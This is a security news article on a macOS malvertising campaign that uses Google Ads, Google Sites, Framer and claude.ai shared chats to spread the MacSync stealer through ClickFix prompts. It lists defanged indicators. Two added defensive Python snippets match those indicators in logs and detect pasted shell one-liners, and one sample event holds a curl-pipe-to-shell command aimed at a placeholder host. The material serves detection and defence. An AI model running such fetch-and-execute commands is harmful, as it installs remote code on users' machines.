macOS Malware Leverages Google Ads and Legitimate Claude.ai Shared Chats to Deliver Malware
By Abinaya
May 11, 2026
Threat actors are executing a sophisticated malvertising campaign targeting macOS users via poisoned Google Ads and deceptive artificial intelligence applications.
Researchers recently uncovered an operation that redirects victims to fraudulent landing pages via sponsored search results.
By combining trusted hosting platforms with the notorious “ClickFix” social engineering tactic, attackers are successfully distributing MacSync payloads and dangerous macOS information stealers.
The attack chain begins when a user searches for popular software, particularly AI tools like Claude.
Attackers manipulate search engine results by purchasing sponsored ads that appear at the top of search results pages.
Because these ads often mimic legitimate vendors, end users struggle to distinguish them from authentic links.
Search ads redirect users to malicious sites delivering MacSync ClickFix payloads (source: X)
When clicked, these sponsored advertisements route victims to deceptive websites hosted on trusted infrastructure.
To bypass initial domain reputation checks and enterprise web filters, threat actors are leveraging services like Google Sites, Framer, and even legitimate claude.ai shared chats.
The landing pages are carefully designed to look like official Claude AI download portals.
Google Ads and Claude.ai chats spread fake MacSync installers (source: X)
When users attempt to interact with the site or download the purported desktop application, they are shown a ClickFix prompt.
This prompt uses deceptive warning dialogs to trick victims into manually executing a malicious terminal command, or into downloading a compromised installer, under the guise of “fixing” a display error.
Researchers Berk Albayrak and g0njxa published findings on X tracing the infrastructure behind the targeted malware campaign.
The threat actors frequently rotate their domains and hosting platforms to evade detection while maximizing their search engine optimization.
The campaign relies heavily on Google Sites to host the initial deceptive pages, with researchers identifying malicious URLs such as sites[.]google[.]com/view/cloud-version-08, sites[.]google[.]com/view/brewshka-page, and sites[.]google[.]com/view/claud-version-0505.
In addition to Google Sites, the attackers have utilized the Framer platform, hosting fake applications at claude-desktop-app[.]framer[.]ai.
Payload Delivery and Execution
Once the victim interacts with the fake Claude AI portal, the site redirects them to the final payload delivery servers.
The initial landing pages have been observed redirecting traffic to external IP addresses, such as 2[.]26[.]75[.]112/Hokojol, and to domains such as pieoneer[.]org and greenactiv[.]com.
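As an added example (not code from the article or from the researchers), the Python below refangs the indicators listed above, separates hostname-level blocks from the Google Sites entries that can only be matched on URL path, and checks constructed proxy log lines against them; the log format and client addresses are assumptions.

```python
from urllib.parse import urlparse
# Indicators as published in the article (defanged with "[.]").
DEFANGED_IOCS = [
    "sites[.]google[.]com/view/cloud-version-08",
    "sites[.]google[.]com/view/brewshka-page",
    "sites[.]google[.]com/view/claud-version-0505",
    "claude-desktop-app[.]framer[.]ai",
    "2[.]26[.]75[.]112/Hokojol",
    "pieoneer[.]org",
    "greenactiv[.]com",
]

def refang(ioc: str) -> str:
    # Restore a defanged indicator to its matchable form.
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def split_indicators(iocs):
    # sites.google.com is a shared platform: blocking the hostname would take
    # down every Google Sites page, so those entries match on host+path only.
    hosts, prefixes = set(), set()
    for raw in iocs:
        host, _, path = refang(raw).partition("/")
        if host == "sites.google.com" and path:
            prefixes.add(f"{host}/{path}")
        else:
            hosts.add(host)
    return hosts, prefixes

def match_url(url: str, hosts, prefixes):
    # Return the indicator a request URL matches, or None.
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in hosts:
        return host
    candidate = host + parsed.path
    return next((p for p in prefixes if candidate.startswith(p)), None)

# Constructed proxy log lines ("timestamp client url"); not from the article.
SAMPLE_PROXY_LOG = """\
2026-05-11T09:01:09Z 10.0.0.5 https://sites.google.com/view/claud-version-0505
2026-05-11T09:01:15Z 10.0.0.5 https://claude-desktop-app.framer.ai/
2026-05-11T09:01:20Z 10.0.0.5 http://2.26.75.112/Hokojol
2026-05-11T09:02:00Z 10.0.0.7 https://sites.google.com/view/some-unrelated-page
"""
def scan_log(log_text: str):
    # Return (client, url, matched_indicator) for every hit in the log.
    hosts, prefixes = split_indicators(DEFANGED_IOCS)
    hits = []
    for line in log_text.splitlines():
        _ts, client, url = line.split()
        if ioc := match_url(url, hosts, prefixes):
            hits.append((client, url, ioc))
    return hits
```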
MacSync ClickFix payload (source: X)
These destination servers drop the MacSync clickfix payload directly onto the victim’s machine. Upon execution, the malware operates as a comprehensive macOS stealer.
It is specifically designed to harvest sensitive information from the infected Apple system, including saved browser credentials, cryptocurrency wallet data, and active session tokens.
The stolen data is subsequently exfiltrated back to the attackers’ command-and-control infrastructure.
To defend against these deceptive malvertising campaigns, organizations and individual users must exercise extreme caution when interacting with sponsored search results.
Security teams should block the known indicators of compromise at the network level and monitor macOS endpoint telemetry for unusual script execution originating from web browsers.
Educate users to avoid clicking on sponsored software download ads; they should always navigate directly to official vendor websites.
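An added example of the endpoint telemetry check suggested above (not from the article): a small heuristic over constructed macOS process events that flags shell or osascript processes whose command line has the shape of a pasted fetch-and-execute one-liner, or that were spawned under a browser process. The event format, process names, placeholder URL and detection patterns are all assumptions.

```python
import re

BROWSERS = {"Safari", "Google Chrome", "firefox"}
SHELLS = {"bash", "zsh", "sh", "osascript"}
# Command-line shapes of copy-paste "fix" one-liners (heuristic patterns).
SUSPICIOUS = [
    re.compile(r"\bcurl\b.*\|\s*(sh|bash|zsh)\b"),
    re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    re.compile(r"\bosascript\s+-e\b"),
]

# Constructed process events (pid, ppid, name, cmdline); not real telemetry.
EVENTS = [
    {"pid": 1, "ppid": 0, "name": "launchd", "cmdline": "/sbin/launchd"},
    {"pid": 300, "ppid": 1, "name": "Safari", "cmdline": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"pid": 410, "ppid": 1, "name": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 411, "ppid": 410, "name": "zsh", "cmdline": "-zsh"},
    {"pid": 412, "ppid": 411, "name": "bash", "cmdline": "bash -c 'echo aGVsbG8= | base64 -d | sh'"},
    {"pid": 420, "ppid": 411, "name": "bash", "cmdline": "bash -c 'curl -fsSL http://payload.example/x | sh'"},
    {"pid": 430, "ppid": 411, "name": "git", "cmdline": "git status"},
    {"pid": 500, "ppid": 300, "name": "sh", "cmdline": "sh -c 'open /tmp/installer.dmg'"},
]

def ancestry(pid, by_pid):
    """Process names from the process itself up to the root."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events):
    """Flag shells that look like a pasted one-liner or that run under a browser."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["name"] not in SHELLS:
            continue
        chain = ancestry(e["pid"], by_pid)
        reasons = []
        if any(p.search(e["cmdline"]) for p in SUSPICIOUS):
            reasons.append("fetch-and-execute one-liner")
        if any(a in BROWSERS for a in chain[1:]):
            reasons.append("shell spawned under a browser")
        if reasons:
            alerts.append({"pid": e["pid"], "chain": " <- ".join(chain), "reasons": reasons})
    return alerts
```

The parent chain is reported with each alert because a pasted ClickFix command shows up under Terminal rather than the browser, so analysts need both signals rather than a browser-parent rule alone.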
Abinaya (https://cybersecuritynews.com/)
Abi is a Security Editor and fellow reporter with Cyber Security News. She covers various cyber security incidents happening in cyberspace.